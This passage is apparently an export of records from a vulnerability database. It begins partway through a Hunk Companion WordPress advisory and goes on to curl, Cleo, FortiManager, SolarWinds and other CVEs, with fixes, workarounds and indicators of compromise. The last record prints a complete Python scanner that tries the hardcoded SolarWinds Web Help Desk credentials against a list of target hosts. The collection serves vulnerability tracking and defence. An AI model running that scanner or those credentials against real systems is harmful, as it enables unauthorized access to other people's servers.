1.8.7, indicating that the vulnerability had persisted in the current version.\n\nCode Analysis\n-------------\n\nAn analysis of the code responsible for the `themehunk‑import` endpoint revealed the vulnerability being exploited.\n\nWithin the file `hunk‑companion/import/core/class‑installation.php`, the class `HUNK_COMPANION_SITES_BUILDER_SETUP` is executed by the endpoint and handles plugin installation and activation.\n\nOn line 204, the following code demonstrates that the WordPress.org URL is hardcoded, restricting installations to plugins hosted on the WordPress.org repository:\n\n```\n$temp_file = download_url('https://downloads.wordpress.org/plugin/'.$slug.'.zip');\n\n```\n\n\nHowever, this URL allows the download of plugins, even if they have been closed or removed from the repository. This behavior introduces a significant vector for exploitation, enabling attackers to install vulnerable plugins.\n\nThe vulnerability stems from the weakness found in `hunk‑companion/import/app/app.php`:\n\n```\n        register_rest_route( 'hc/v1', 'themehunk-import', array(\n          'methods' => 'POST',\n          'callback' => array( $this, 'tp_install' ),\n          'permission_callback' => function () {\n    // Check if the user is logged in\n    if ( ! is_user_logged_in() ) {\n      //return new WP_REST_Response( 'Unauthorized: User not logged in', 401 );\n    }\n\n    // Debug: Log the user role and capabilities to see what they have\n    $current_user = wp_get_current_user();\n    // error_log( 'Current user: ' . $current_user->user_login );\n    // error_log( 'User roles: ' . implode( ', ', $current_user->roles ) );\n    // error_log( 'User capabilities: ' . print_r( $current_user->allcaps, true ) );\n\n    // Ensure the user has the 'install_plugins' capability\n    if ( ! current_user_can( 'install_plugins' ) ) {\n        return new WP_REST_Response( 'Unauthorized: Insufficient capabilities', 401 );\n    }\n\n      // Get the nonce from the request header\n            $nonce = $request->get_header('X-WP-Nonce');\n\n            // Verify the nonce\n            if ( ! wp_verify_nonce( $nonce, 'hc_import_nonce' ) ) {\n                return new WP_REST_Response( 'Unauthorized: Invalid nonce', 401 );\n            }\n\n    return true; // Permission granted\n},\n\n      ) );\n\n```\n\n\nLines 28‑59 register the REST API route for `themehunk‑import`. In version 1.8.5, the plugin author introduced a `permission_callback` to restrict access. However, for [`permission_callback`](https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/#permissions-callback) to work correctly, it must return a boolean (`false` to reject requests, `true` to accept) or a `WP_Error` object.\n\nIn this case, failed conditions return `new WP_REST_Response`, which is not a boolean or `WP_Error`. As a result, the `permission_callback` always evaluates to `true`, allowing unauthenticated requests to bypass the intended checks. This flaw enables the execution of the `tp_install` function, which invokes the `HUNK_COMPANION_SITES_BUILDER_SETUP` class, leading to the installation and activation of arbitrary plugins.\n\n### Recommended Fix\n\nTo address this issue, the `themehunk‑import` and `ai‑site‑import` endpoints needed to be patched. Specifically, the return statements for failed conditions needed to be changed. For example, replace:\n\n```\nreturn new WP_REST_Response( 'Unauthorized: User not logged in', 401 );\n\n```\n\n\nWith:\n\n```\nreturn new WP_Error( 'unauthorized', __( 'You must be logged in.' ), array( 'status' => 401 ) );\n\n```\n\n\nThis change ensures the `permission_callback` correctly denies unauthorized requests, mitigating the vulnerability.\n\nAs of 1.9.0, the author implemented the necessary patch, and we have confirmed that the exploit is no longer present.\n\nConclusion\n----------\n\nThis vulnerability represents a significant and multifaceted threat, targeting sites that use both a [ThemeHunk theme](https://profiles.wordpress.org/themehunk/#content-themes) and the Hunk Companion plugin. With over 10,000 active installations, this exposed thousands of websites to anonymous, unauthenticated attacks capable of severely compromising their integrity.\n\nWhat makes this attack particularly dangerous is its combination of factors—leveraging a previously patched vulnerability in Hunk Companion to install a now‑removed plugin with a known Remote Code Execution flaw. The chain of exploitation underscores the importance of securing every component of a WordPress site, especially third‑party themes and plugins, which can become critical points of entry for attackers.\n\nAs WordPress remains the most popular content management system in the world, such vulnerabilities serve as a stark reminder of the ongoing challenges in maintaining site security. It’s imperative for developers, site owners, and plugin authors alike to adopt proactive measures, such as regularly updating plugins and themes, auditing for known vulnerabilities, and disabling unused or unnecessary extensions.\n\nTimeline\n--------\n\n**Nov 27th, 2024** – Internal discovery of this vulnerability. We reported issue to Hunk Companion\n\n**Dec 10th, 2024** – Hunk Companion confirms acknowledges issue and releases a patch.\n\n**Dec 10th, 2024** – We published this advisory.\n\n_The PoC will be displayed on January 14, 2025, to give users the time to update._\n\nCredits\n-------\n\nOriginal research: Daniel Rodriguez\n\n**Acknowledgments**: Special thanks to the WPScan team and Ashley Robicheau for feedback, help, and corrections.",
   description_format: "markdown",
   vulnerability: "CVE-2024-11972",
   creation_timestamp: "2024-12-15T06:47:50.105587+00:00",
   timestamp: "2024-12-15T06:47:50.105587+00:00",
   related_vulnerabilities: [
      "CVE-2024-9707",
      "CVE-2024-50498",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

{
   uuid: "36846c73-0c66-4bdf-b5f9-3a3b65823062",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "netrc and redirect credential leak",
   description: "When asked to both use a .netrc file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname but the entry either omits just the password or omits both login and password.\n\n### Info\n\n> \"A curl transfer with a.tld that redirects to b.tld that uses a .netrc like below (with a match, but no password specified for the second host), would make curl pass on alicespassword as password even in the second transfer to the separate host b.tld.\n> \n> machine a.tld\n>   login alice\n>   password alicespassword\n> default\n>   login bob\n> \n> This bug is not considered a C mistake. It is not likely to have been avoided had we not been using C.\n> \n> This flaw also affects the curl command line tool.\n> \n> The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2024-11053 to this issue.\n> \n> CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n> \n> Severity: Low\"\n\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-11053",
   creation_timestamp: "2024-12-11T09:52:06.061616+00:00",
   timestamp: "2024-12-11T09:52:06.061616+00:00",
   related_vulnerabilities: [
      "CVE-2024-11053",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
      {
         ref: [
            "https://mastodon.social/@bagder/113632978982393745",
            "https://curl.se/docs/CVE-2024-11053.html",
         ],
      },
   ],
}

{
   uuid: "92cdf9dd-1009-427b-8181-b444dc288f89",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "INCIDENT: Threat Actors Currently Mass-Exploiting Cleo Servers (0-day-ish) 👾 (source reddit)",
   description: "- [INCIDENT: Threat Actors Currently Mass-Exploiting Cleo Servers (0-day-ish) 👾 ](https://www.reddit.com/r/sysadmin/comments/1haqguq/incident_threat_actors_currently_massexploiting/?rdt=59586)\n\nhttps://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\n\nOn December 3, Huntress identified an emerging threat involving Cleo’s LexiCom, VLTransfer, and Harmony software, commonly used to manage file transfers. We’ve directly observed evidence of threat actors exploiting this software en masse and performing post-exploitation activity. Although Cleo published an update and advisory for CVE-2024-50623—which allows unauthenticated remote code execution—Huntress security researchers have recreated the proof of concept and learned the patch does not mitigate the software flaw.\n\n‍TL;DR - This vulnerability is being actively exploited in the wild and fully patched systems running 5.8.0.21 are still exploitable. We strongly recommend you move any internet-exposed Cleo systems behind a firewall until a new patch is released.",
   description_format: "markdown",
   vulnerability: "CVE-2024-50623",
   creation_timestamp: "2024-12-10T07:56:04.828065+00:00",
   timestamp: "2024-12-10T07:57:07.099373+00:00",
   related_vulnerabilities: [
      "CVE-2024-50623",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

{
   uuid: "a306876b-06cc-486b-988e-78087547fd22",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2024-36401 GeoServer Remote Code Execution",
   description: "- CVE-2024-36401 GeoServer Remote Code Execution - https://github.com/0x0d3ad/CVE-2024-36401",
   description_format: "markdown",
   vulnerability: "cve-2024-36401",
   creation_timestamp: "2024-11-28T21:52:40.484680+00:00",
   timestamp: "2024-11-28T21:52:40.484680+00:00",
   related_vulnerabilities: [
      "CVE-2024-36401",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "cb0ad24f-1243-4f18-9607-95a5717fb451",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack",
   description: "- [Kritische Sicherheitslücke in Laravel Framework - Updates verfügbar ](https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-laravel-framework-updates-verfugbar)\n- [Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack](https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-millions-of-web-applications-to-attack/)",
   description_format: "markdown",
   vulnerability: "CVE-2024-52301",
   creation_timestamp: "2024-11-18T07:05:03.432836+00:00",
   timestamp: "2024-11-18T07:05:28.583042+00:00",
   related_vulnerabilities: [
      "CVE-2024-52301",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

{
   uuid: "9579afd1-e7a6-4754-8574-5acaed28e11d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Rapid7 analysis of CVE-2024-47575",
   description: "- [Rapid7 Analysis of CVE-2024-47575](https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis#rapid7-analysis)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-11-14T08:13:33.806989+00:00",
   timestamp: "2024-11-14T08:13:33.806989+00:00",
   related_vulnerabilities: [
      "CVE-2024-47575",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

{
   uuid: "a57c1b41-602a-4340-b6bf-c7e95751f645",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System",
   description: "> \n« Nov 05, 2024 Ravie LakshmananMobile Security / Vulnerability\nVulnerability in Android System\n\nGoogle has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.\n\nThe vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to \"Android/data,\" \"Android/obb,\" and \"Android/sandbox\" directories, and their respective sub-directories, according to a code commit message.»\n\n\n[Android Security Bulletin November 2024](https://source.android.com/docs/security/bulletin/2024-11-01)",
   description_format: "markdown",
   vulnerability: "CVE-2024-43093",
   creation_timestamp: "2024-11-08T08:48:36.588145+00:00",
   timestamp: "2024-11-08T08:49:29.657124+00:00",
   related_vulnerabilities: [
      "CVE-2024-43093",
   ],
   meta: [
      {
         refs: [
            "https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html",
            "https://source.android.com/docs/security/bulletin/2024-11-01",
         ],
      },
   ],
}

{
   uuid: "59dce60f-7719-44c7-9f8b-5ef37763c997",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof of concept for CVE-2024-37383",
   description: "- [https://github.com/bartfroklage/CVE-2024-37383-POC](https://github.com/bartfroklage/CVE-2024-37383-POC)",
   description_format: "markdown",
   vulnerability: "CVE-2024-37383",
   creation_timestamp: "2024-11-07T17:02:33.331102+00:00",
   timestamp: "2024-11-07T17:02:33.331102+00:00",
   related_vulnerabilities: [
      "CVE-2024-37383",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "3f11fc07-94c7-4c49-b71c-caff6266b8b2",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution (still exploited)",
   description: "- https://packetstormsecurity.com/files/172820/Zyxel-IKE-Packet-Decoder-Unauthenticated-Remote-Code-Execution.html\n\nWe still see exploitation of that vulnerability in a black-hole network.",
   description_format: "markdown",
   vulnerability: "CVE-2023-28771",
   creation_timestamp: "2024-11-06T15:21:53.583555+00:00",
   timestamp: "2024-11-06T15:21:53.583555+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

{
   uuid: "c1a30f74-0435-4ac7-a977-50ef00fdffe0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Chrome -  Stable Channel Update for Desktop",
   description: "- [Stable Channel Update for Desktop](https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop.html)\n\nCVE-2024-10826: Use after free in Family Experiences. Reported by Anonymous on 2024-09-29",
   description_format: "markdown",
   vulnerability: "CVE-2024-10826",
   creation_timestamp: "2024-11-06T09:47:00.820445+00:00",
   timestamp: "2024-11-06T09:47:00.820445+00:00",
   related_vulnerabilities: [
      "CVE-2024-10826",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "65dab379-0829-483c-b7ec-7176fcaec354",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Chrome release -  Stable Channel Update for Desktop",
   description: "- [Chrome release -  Stable Channel Update for Desktop ](https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop.html)\n\n High CVE-2024-10827: Use after free in Serial. Reported by Anonymous on 2024-10-23",
   description_format: "markdown",
   vulnerability: "CVE-2024-10827",
   creation_timestamp: "2024-11-06T09:34:53.961210+00:00",
   timestamp: "2024-11-06T09:34:53.961210+00:00",
   related_vulnerabilities: [
      "CVE-2024-10827",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "fc8919b9-2200-4953-9752-83a8d586e76e",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "\"Please, remove this from the Internet *even if fully patched*\" comment from watchTowr",
   description: "~~~\nwe’re back, and despite all the buzz about FortiManager - the saga is about to continue.\n\nPlease, remove this from the Internet *even if fully patched*\n\nspeak soon.\n~~~\n\nRef: [https://x.com/watchtowrcyber/status/1853262240822276534](https://x.com/watchtowrcyber/status/1853262240822276534)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-11-05T13:43:12.294048+00:00",
   timestamp: "2024-11-05T13:43:12.294048+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

{
   uuid: "e147bc02-1352-4685-8d0a-692e2fe98072",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "MISP event related with IoCs",
   description: "A MISP event in JSON format is available with all details and IoCs.\n\n- [MISP event Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)](https://www.circl.lu/doc/misp/feed-osint/4fe85264-fb26-494e-8eb7-da101e19e291.json)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-10-25T07:18:54.820316+00:00",
   timestamp: "2024-10-25T07:18:54.820316+00:00",
   related_vulnerabilities: [
      "CVE-2024-47575",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "9baa9351-dc32-4f7d-b01d-eeb3a51e50be",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "(Vendor information) Missing authentication in fgfmsd",
   description: "A missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.\n\nReports have shown this vulnerability to be exploited in the wild.\n\nPSIRT | FortiGuard Labs\n9–11 minutes\nSummary\n\nA missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.\n\nReports have shown this vulnerability to be exploited in the wild.\nVersion \tAffected \tSolution\nFortiManager 7.6 \t7.6.0 \tUpgrade to 7.6.1 or above\nFortiManager 7.4 \t7.4.0 through 7.4.4 \tUpgrade to 7.4.5 or above\nFortiManager 7.2 \t7.2.0 through 7.2.7 \tUpgrade to 7.2.8 or above\nFortiManager 7.0 \t7.0.0 through 7.0.12 \tUpgrade to 7.0.13 or above\nFortiManager 6.4 \t6.4.0 through 6.4.14 \tUpgrade to 6.4.15 or above\nFortiManager 6.2 \t6.2.0 through 6.2.12 \tUpgrade to 6.2.13 or above\nFortiManager Cloud 7.6 \tNot affected \tNot Applicable\nFortiManager Cloud 7.4 \t7.4.1 through 7.4.4 \tUpgrade to 7.4.5 or above\nFortiManager Cloud 7.2 \t7.2.1 through 7.2.7 \tUpgrade to 7.2.8 or above\nFortiManager Cloud 7.0 \t7.0.1 through 7.0.12 \tUpgrade to 7.0.13 or above\nFortiManager Cloud 6.4 \t6.4 all versions \tMigrate to a fixed release\n\nOld FortiAnalyzer models 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E with the following feature enabled (FortiManager on FortiAnalyzer):\n\nconfig system global\nset fmg-status enable\nend\n\nand at least one interface with fgfm service enabled are also impacted by this vulnerability.\n\nWorkarounds\n\nUpgrade to a fixed version or use one of the following workarounds, depending on the version you're running:\n\n1- For FortiManager versions 7.0.12 or above, 7.2.5 or above, 7.4.3 or above (but not 7.6.0), prevent unknown devices to attempt to register:\n\nconfig system global\n(global)# set fgfm-deny-unknown enable\n(global)# end\n\nWarning: With this setting enabled, be aware that if a FortiGate's SN is not in the device list, FortiManager will prevent it from connecting to register upon being deployed, even when a model device with PSK is matching.\n\nIf FAZ features are enabled on FMG, block the addition of unauthorized devices via syslog:\n\nconf system global\nset detect-unregistered-log-device disable\nend\n\nIf FortiGate Updates or Web Filtering are enabled, block the addition of unauthorized devices via FDS:\n\nconf fmupdate fds-setting\nset unreg-dev-option ignore\nend\n\n2- Alternatively, for FortiManager versions 7.2.0 and above, you may add local-in policies to whitelist the IP addresses of FortiGates that are allowed to connect.\n\nExample:\n\nconfig system local-in-policy\nedit 1\nset action accept\nset dport 541\nset src\nnext\nedit 2\nset dport 541\nnext\nend\n\n3- For 7.2.2 and above, 7.4.0 and above, 7.6.0 and above it is also possible to use a custom certificate which will mitigate the issue:\n\nconfig system global\nset fgfm-ca-cert\nset fgfm-cert-exclusive enable\n\nend\n\nAnd install that certificate on FortiGates. Only this CA will be valid, this can act as a workaround, providing the attacker cannot obtain a certificate signed by this CA via an alternate channel.\n\nNB: For FortiManager versions 6.2, 6.4, and 7.0.11 and below, please upgrade to one of the versions above and apply the above workarounds.\n\nIndicators of Compromise\n\nThe following are possible IoCs:\n\nLog entries\n\ntype=event,subtype=dvm,pri=information,desc=\"Device,manager,generic,information,log\",user=\"device,...\",msg=\"Unregistered device localhost add succeeded\" device=\"localhost\" adom=\"FortiManager\" session_id=0 operation=\"Add device\" performed_on=\"localhost\" changes=\"Unregistered device localhost add succeeded\"\n\ntype=event,subtype=dvm,pri=notice,desc=\"Device,Manager,dvm,log,at,notice,level\",user=\"System\",userfrom=\"\",msg=\"\" adom=\"root\" session_id=0 operation=\"Modify device\" performed_on=\"localhost\" changes=\"Edited device settings (SN FMG-VMTM23017412)\"\n\nIP addresses\n\n45.32.41.202\n104.238.141.143\n158.247.199.37\n45.32.63.2\n195.85.114.78 (Not observed by Fortinet, reported by Mandiant here)\n\nSerial Number\n\nFMG-VMTM23017412\n\nFiles\n\n/tmp/.tm\n/var/tmp/.tm\n\nNote that file IoCs may not appear in all cases.\n\nRisk\n\nThe identified actions of this attack in the wild have been to automate via a script the exfiltration of various files from the FortiManager which contained the IPs, credentials and configurations of the managed devices.\n\nAt this stage, we have not received reports of any low-level system installations of malware or backdoors on these compromised FortiManager systems. To the best of our knowledge, there have been no indicators of modified databases, or connections and modifications to the managed devices.\n\nRecovery\n\nA FortiManager configuration backup file would not contain any OS or system-level file\nchanges, as these files are not included in the archive. Therefore, taking a backup from a\ncompromised system and then restoring it on a fresh or re-initialized one, would not carry\nover and re-introduce such low-level changes. When taking this approach, be aware that the\ndata may have been tampered with. Careful review should be done to confirm configuration\naccuracy.\n\nThe methods below assume that the managed devices (FortiGates or other) contained in the\nbackup have not been tampered with and that their configurations are reliable. Event log\nactivity verification of the FortiGates should be reviewed starting from the date of the\nidentified IoCs, to determine if there were any unauthorized access or configuration changes.\nSince data may have been exfiltrated from the FortiManager database, we recommend that\nthe credentials, such as passwords and user-sensitive data, of all managed devices, be\nurgently changed.\n\nFor VM installations, recovery can be facilitated by keeping a copy of the compromised\nFortiManager in an isolated network with no Internet connection, as well as configuring it in\noffline mode and closed-network mode operation (see settings below). This system can be\nused to compare with the new one which will be set up in parallel.\n\nconfig system admin setting\nset offline_mode enable\nend\nconfig fmupdate publicnetwork\nset status disable\nend\n\nRecovery Methods\n\nOption 1 – Recommended Recovery Action\n\nThis method ensures that the FortiManager configuration was not tampered with. It will\nrequire database rebuilding or device configuration resynchronizations at the Device and\nPolicy Package ADOM levels.\n\n• Installing a fresh FortiManager VM or re-initializing a hardware model and\nadding/discovering the devices.\n• Installing a fresh FortiManager VM or re-initializing a hardware model, and restoring a\nbackup taken before the IoC detection.\n\nOption 2 – Alternative Recovery Action\n\nThis method provides a quick recovery, where partial or no database\nrebuilding/resynchronization is required. It requires that you manually verify accuracy of the\ncurrently running FortiManager configuration\n\n• Installing a fresh FortiManager VM or re-initializing a hardware model and\nrestoring/copying components or configuration sections from a compromised\nFortiManager.\n• Installing a fresh FortiManager VM or re-initializing a hardware model, and restoring a\nbackup from a compromised FortiManager.\n\nFor more info on data configuration and synchronization procedures: https://community.fortinet.com/t5/FortiManager/Technical-Tip-FortiManager-data-configuration-and/ta-p/351748\n\n\n\n- [https://www.fortiguard.com/psirt/FG-IR-24-423](https://www.fortiguard.com/psirt/FG-IR-24-423)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-10-25T07:11:40.672278+00:00",
   timestamp: "2024-10-25T07:11:40.672278+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

{
   uuid: "55eb3309-c5c3-4f89-bdbd-e3ffa97ab779",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)",
   description: "In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, CVE-2024-47575 / FG-IR-24-423, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices. \n\nMandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.\n\nAt this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. As additional information becomes available through our investigations, Mandiant will update this blog’s attribution assessment.\n\nOrganizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.\n\nRef:  [https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575](https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-10-24T08:04:32.724240+00:00",
   timestamp: "2024-10-24T08:05:11.171573+00:00",
   related_vulnerabilities: [
      "CVE-2024-47575",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
      {},
   ],
}

{
   uuid: "a3186180-3808-47e1-8347-071389b4f994",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Patches released previously did not completely mitigate the vulnerability",
   description: "VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability.\n\nhttps://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968",
   description_format: "markdown",
   vulnerability: "CVE-2024-38812",
   creation_timestamp: "2024-10-22T13:20:32.036514+00:00",
   timestamp: "2024-10-22T13:20:32.036514+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
      {
         resources: [
            "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968",
         ],
      },
   ],
}

{
   uuid: "f9ef410e-5884-4a57-a0d5-a3a16d9ff8fa",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Availability of a patch",
   description: "The company released [a patch](https://solarwindscore.my.site.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2?language=en_US) in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw.",
   description_format: "markdown",
   vulnerability: "CVE-2024-28987",
   creation_timestamp: "2024-10-18T22:25:32.495082+00:00",
   timestamp: "2024-10-18T22:26:03.012172+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
         resources: [
            "https://solarwindscore.my.site.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2",
         ],
      },
   ],
}

{
   uuid: "20187f45-138c-48ba-b11f-52dc3ddfd69e",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof-of-Concept",
   description: "A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC\n\n\n```python\nimport argparse\nimport base64\nimport requests\n\n# Created by Ghost sec.\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\nascii_art = f\"\"\"\n{BOLD}{RED}\n  ______   __                              __                                         \n /      \\ /  |                            /  |                                        \n/$$$$$$  |$$ |____    ______    _______  _$$ |_           _______   ______    _______ \n$$ | _$$/ $$      \\  /      \\  /       |/ $$   |         /       | /      \\  /       |\n$$ |/    |$$$$$$$  |/$$$$$$  |/$$$$$$$/ $$$$$$/         /$$$$$$$/ /$$$$$$  |/$$$$$$$/ \n$$ |$$$$ |$$ |  $$ |$$ |  $$ |$$      \\   $$ | __       $$      \\ $$    $$ |$$ |      \n$$ \\__$$ |$$ |  $$ |$$ \\__$$ | $$$$$$  |  $$ |/  |       $$$$$$  |$$$$$$$$/ $$ \\_____ \n$$    $$/ $$ |  $$ |$$    $$/ /     $$/   $$  $$/       /     $$/ $$       |$$       |\n $$$$$$/  $$/   $$/  $$$$$$/  $$$$$$$/     $$$$/        $$$$$$$/   $$$$$$$/  $$$$$$$/ \n PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel\n{RESET}\n\"\"\"\n\nprint(ascii_art)\n\ndef get_basic_auth_header(username, password):\n    credentials = f\"{username}:{password}\"\n    base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8')\n    return {'Authorization': f'Basic {base64_credentials}'}\n\ndef scan_target(hostname):\n    # Ensure hostname does not have trailing slashes\n    hostname = hostname.strip().rstrip('/')\n    url = f\"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/\"\n    \n    # Print formatted URL for debugging\n    print(f\"{BOLD}[*] Scanning URL: {url}{RESET}\")\n    \n    headers = get_basic_auth_header(\"helpdeskIntegrationUser\", \"dev-C4F8025E7\")\n    headers['Content-Type'] = 'application/x-www-form-urlencoded'\n    \n    try:\n        response = requests.get(url, headers=headers, timeout=10)\n        if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text:\n            print(f\"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}\")\n        else:\n            print(f\"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}\")\n    except requests.RequestException:\n        # Modify this line to just print \"Not vulnerable\" instead of the error details\n        print(f\"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}\")\n\ndef scan_targets_from_file(file_path):\n    try:\n        with open(file_path, 'r') as file:\n            targets = file.readlines()\n            if not targets:\n                print(f\"{BOLD}{RED}[!] No targets found in file{RESET}\")\n                return\n            for target in targets:\n                target = target.strip()\n                if target:\n                    scan_target(target)\n    except FileNotFoundError:\n        print(f\"{BOLD}{RED}[!] File {file_path} not found{RESET}\")\n    except Exception as e:\n        print(f\"{BOLD}{RED}[!] An error occurred: {e}{RESET}\")\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential\")\n    parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets')\n\n    args = parser.parse_args()\n    \n    scan_targets_from_file(args.file)\n\nif __name__ == \"__main__\":\n    main()\n```",
   description_format: "markdown",
   vulnerability: "CVE-2024-28987",
   creation_timestamp: "2024-10-18T22:23:39.387177+00:00",
   timestamp: "2024-10-18T22:23:49.363557+00:00",
   related_vulnerabilities: [
      "CVE-2024-28987",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
